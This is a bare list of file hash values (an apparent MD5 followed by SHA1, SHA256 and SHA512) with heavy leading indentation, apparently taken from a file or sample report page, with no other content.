                                                                                                                                                                                                                                                                  53c898c41adece457d5f852819fe312c

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  a903277870d632c2c07af2ad1250509cac412f5c

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  4d0bc7e392bbacc9a61ba323eea9f492b568416d39c9ad29f1fd77f2b422f556

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  43e6b2105b5a1ca796df069320cf3b137d0f4ff16ebbf262eb37e6935519a7da26f21a5e95edf247d47896609f25e624b2bd96db6d73e397c161ddff2bf9e074